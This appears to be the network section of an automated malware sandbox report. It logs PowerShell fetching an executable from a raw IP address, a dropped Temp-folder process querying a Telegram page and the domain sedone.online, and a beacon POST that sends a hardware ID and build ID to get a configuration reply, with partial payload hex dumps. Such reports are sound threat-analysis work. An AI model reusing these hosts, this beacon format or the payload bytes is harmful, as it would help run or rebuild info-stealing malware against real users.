                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.322968960 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.352199078 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.352225065 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.370214939 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.370242119 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.370275021 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.370290995 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.370301008 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.370310068 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.370364904 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:03.370382071 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.428024054 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.429579020 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.430075884 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.430083036 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.431570053 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.431595087 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.431623936 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.431638956 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.661449909 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.661525965 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.661541939 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.661581993 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.661587000 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.661622047 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.661674023 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.661720991 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.662383080 CET49933443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:04.662395000 CET44349933116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.040612936 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.040651083 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.040741920 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.040981054 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.040991068 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.472210884 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.472309113 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.472445011 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.472445011 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.485327005 CET49936443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:05.485343933 CET44349936116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.068499088 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.068545103 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.068672895 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.068824053 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.068840027 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.440912962 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.441103935 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.441628933 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.441636086 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.444133997 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.444138050 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.444272041 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:06.444277048 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.472067118 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.472155094 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.472254992 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.472862005 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.473193884 CET49942443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.473211050 CET44349942116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.476953983 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.477101088 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.477535963 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.477543116 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.479042053 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.479047060 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.479093075 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:07.479104042 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:08.612190962 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:08.612283945 CET44349944116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:08.612334967 CET49944443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:30:08.612334967 CET49944443192.168.2.4116.203.12.114

                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:16.461806059 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:41.915503025 CET5505953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:42.154649973 CET53550591.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.283391953 CET6134353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.421103001 CET53613431.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.523468971 CET5660253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.841995955 CET53566021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.097019911 CET53516731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.118067026 CET53523281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.201939106 CET5039553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.202081919 CET6530753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.338536024 CET53503951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.339005947 CET53653071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.905616045 CET53531541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:25.797137022 CET53494651.1.1.1192.168.2.4

                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:41.915503025 CET192.168.2.41.1.1.10xe4f4Standard query (0)pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.283391953 CET192.168.2.41.1.1.10xd8c3Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.523468971 CET192.168.2.41.1.1.10x8615Standard query (0)sedone.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.201939106 CET192.168.2.41.1.1.10x6e11Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.202081919 CET192.168.2.41.1.1.10xa220Standard query (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:42.154649973 CET1.1.1.1192.168.2.40xe4f4Name error (3)pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.421103001 CET1.1.1.1192.168.2.40xd8c3No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.841995955 CET1.1.1.1192.168.2.40x8615No error (0)sedone.online116.203.12.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.338536024 CET1.1.1.1192.168.2.40x6e11No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.339005947 CET1.1.1.1192.168.2.40xa220No error (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                  • sedone.online
                                                                                                                                                                                                                                                  • www.google.com
                                                                                                                                                                                                                                                  • 138.124.60.133

                                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.449738138.124.60.133808052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:32.455785036 CET325OUTGET /lem.exe HTTP/1.1
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Accept-Language: en-ch
                                                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                                  Host: 138.124.60.133
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734358072 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:28:33 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 16 Dec 2024 20:29:52 GMT
                                                                                                                                                                                                                                                  ETag: "eecb3-629690af4c859"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 978099
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 28 08 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 d0 10 00 00 04 00 00 db e8 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOt(B8@@@VkH`.textrt `.rdatan+,x@@.data+@.ndata.rsrcV@@.relocf@B
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734405041 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: U\}t+}FEuHGHPuuu@KSV5GWEPu@eEEPu@}eD@FRVVU+MM
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734415054 CET1236INData Raw: 00 00 56 83 e1 0f ff 34 8a 05 e8 c0 40 00 50 e8 a9 53 00 00 83 7c 24 08 00 8b f0 7d 06 56 e8 cd 4b 00 00 8b c6 5e c2 04 00 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 90 eb 47 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 90 40 00 3b
                                                                                                                                                                                                                                                  Data Ascii: V4@PS|$}VK^USVWEPGP3Suu@;ui5@9]uKSPuuWPSutu@jN;t$S5Guuu@3@_^[9Guuu@uU@@Vt
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734565020 CET1236INData Raw: eb 0d 57 68 4c 9c 40 00 c7 45 fc 01 00 00 00 e8 73 49 00 00 59 e9 49 fe ff ff 53 e8 f4 fa ff ff 8b f0 8d 45 08 50 57 68 04 20 00 00 56 ff 15 70 90 40 00 85 c0 74 24 8b 45 08 3b c6 76 29 66 39 18 74 24 56 e8 70 49 00 00 3b c3 74 0e 83 c0 2c 50 ff
                                                                                                                                                                                                                                                  Data Ascii: WhL@EsIYISEPWh Vp@t$E;v)f9t$VpI;t,PuF3fE9]+h WWl@jMQVh SPSh@3EfjXPVDEj16EVPQh
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734610081 CET1236INData Raw: e8 25 f6 ff ff 8b c8 8b 45 e0 83 f8 0c 77 69 ff 24 85 18 32 40 00 03 f9 eb 5e 2b f9 eb 5a 0f af f9 eb 55 3b cb 74 07 8b c7 99 f7 f9 eb 1e 33 ff c7 45 fc 01 00 00 00 eb 3f 0b f9 eb 3b 23 f9 eb 37 33 f9 eb 33 33 c0 3b fb 0f 94 c0 8b f8 eb 28 3b fb
                                                                                                                                                                                                                                                  Data Ascii: %Ewi$2@^+ZU;t3E?;#7333;(;u;t3G;u3;tWCjjYPWVH@E=@;t^H;t?;u;u"uh@CYYh jS@IPEW@V/A@P
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734620094 CET1236INData Raw: 33 c0 66 89 06 66 89 07 e9 16 f7 ff ff 6a ee e8 58 f1 ff ff 8d 4d ec 51 50 89 45 bc e8 75 5f 00 00 33 c9 66 89 0e 89 45 f0 66 89 0f c7 45 fc 01 00 00 00 3b c3 0f 84 b8 0d 00 00 50 6a 40 ff 15 24 91 40 00 89 45 08 3b c3 0f 84 a4 0d 00 00 50 ff 75
                                                                                                                                                                                                                                                  Data Ascii: 3ffjXMQPEu_3fEfE;Pj@$@E;PuSu4_t4EPEPh8@u_tEpV<EpW;]u0@Qjh VW}NuEVWh@jh VWNuE
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734628916 CET776INData Raw: 00 00 56 8d 45 b8 50 53 57 ff 15 44 91 40 00 8d 45 b8 50 56 ff 15 1c 91 40 00 e9 01 f2 ff ff 51 e8 03 3a 00 00 59 89 45 08 39 5d e4 75 44 6a 02 e8 5a ed ff ff 8b f8 3b fb 0f 84 10 f2 ff ff 6a 33 e8 52 ec ff ff 8b f0 56 57 ff 15 10 90 40 00 56 68
                                                                                                                                                                                                                                                  Data Ascii: VEPSWD@EPV@Q:YE9]uDjZ;j3RVW@Vh@AuEhP@:W@<j"Vuh$@:E;udGMQVP.E9]h;t=dGEEEjEjEWE2
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734639883 CET1236INData Raw: 90 40 00 85 c0 0f 85 3c ef ff ff 33 c0 66 89 86 06 40 00 00 eb 9c 66 39 1e 0f 84 f8 05 00 00 56 e8 a5 34 00 00 50 ff 15 bc 90 40 00 e9 e6 05 00 00 6a ed e8 58 e9 ff ff ff 75 dc ff 75 d8 50 e8 6c 33 00 00 83 f8 ff 0f 85 c3 05 00 00 33 c0 66 89 06
                                                                                                                                                                                                                                                  Data Ascii: @<3f@f9V4P@jXuuPl33f Wj@$@E9]t3AM3@%jSSWujhASSH@uL@f9tSMQPuV4PT@EjYE0 ;~M
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734954119 CET224INData Raw: 00 00 6a 01 e8 6a 31 00 00 e9 35 01 00 00 6a 01 e8 a7 e4 ff ff 50 68 84 9a 40 00 e9 97 e9 ff ff 33 c9 e8 7f e4 ff ff 89 45 08 3b 05 cc ea 47 00 0f 83 3d ea ff ff 8b f0 8b 45 dc 69 f6 20 40 00 00 03 35 c8 ea 47 00 3b c3 7c 15 8b 0c 86 75 0a 83 c6
                                                                                                                                                                                                                                                  Data Ascii: jj15jPh@3E;G=Ei @5G;|uVWQQ+Mt3A4EuFP8NEM9]uB3 9]t9]tP=SSqSyR9]
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734963894 CET1236INData Raw: 74 12 8b 4d d8 8b 15 bc ea 47 00 89 8c 82 94 00 00 00 eb 4f 8b 0d bc ea 47 00 ff b4 81 94 00 00 00 57 e8 8a 37 00 00 eb 3a a1 cc 1d 46 00 53 23 c2 50 6a 0b ff 75 f4 ff 15 88 92 40 00 39 5d d4 74 21 53 53 ff 75 f4 ff 15 84 92 40 00 eb 14 6a 01 e8
                                                                                                                                                                                                                                                  Data Ascii: tMGOGW7:FS#Pju@9]t!SSu@jP2PV.EhG3_^[I@@<@P@r@@@B@n@@@@@6@@b@@@@F@i@@@@\@@@@@@@
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.854159117 CET1236INData Raw: e8 dd fd ff ff 85 c0 0f 84 75 fe ff ff 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 8b 75 f8 39 75 14 7d 03 8b 75 14 56 bb 70 01 42 00 53 e8 b1 fd ff ff 85 c0 0f 84 49 fe ff ff 57 8d 45 10 50 56 53 ff 75 0c ff 15 54 91 40 00 85 c0 74 9e 3b 75 10 75 99
                                                                                                                                                                                                                                                  Data Ascii: uuE_^[u9u}uVpBSIWEPVSuT@t;uuu)u9}U(SV3W]]@h NVSG@jhV(}=@u@VMV*V^1PhN*SW@8C;xB


                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.449756149.154.167.994437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:04 UTC86OUTGET /detct0r HTTP/1.1
                                                                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:04 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:04 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 12324
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: stel_ssid=c455af5d5b9812e89a_11315998753397122053; expires=Wed, 18 Dec 2024 16:29:04 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                  2024-12-17 16:29:04 UTC12324INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.449764116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:06 UTC233OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:07 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.449773116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:08 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----USR1V37900ZM7Q1DTJW4
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 256
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:08 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 39 39 39 44 46 32 34 34 34 32 34 30 39 36 35 37 32 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 2d 2d 0d
                                                                                                                                                                                                                                                  Data Ascii: ------USR1V37900ZM7Q1DTJW4Content-Disposition: form-data; name="hwid"6C9999DF24442409657292-a33c7340-61ca------USR1V37900ZM7Q1DTJW4Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------USR1V37900ZM7Q1DTJW4--
                                                                                                                                                                                                                                                  2024-12-17 16:29:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:09 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:09 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
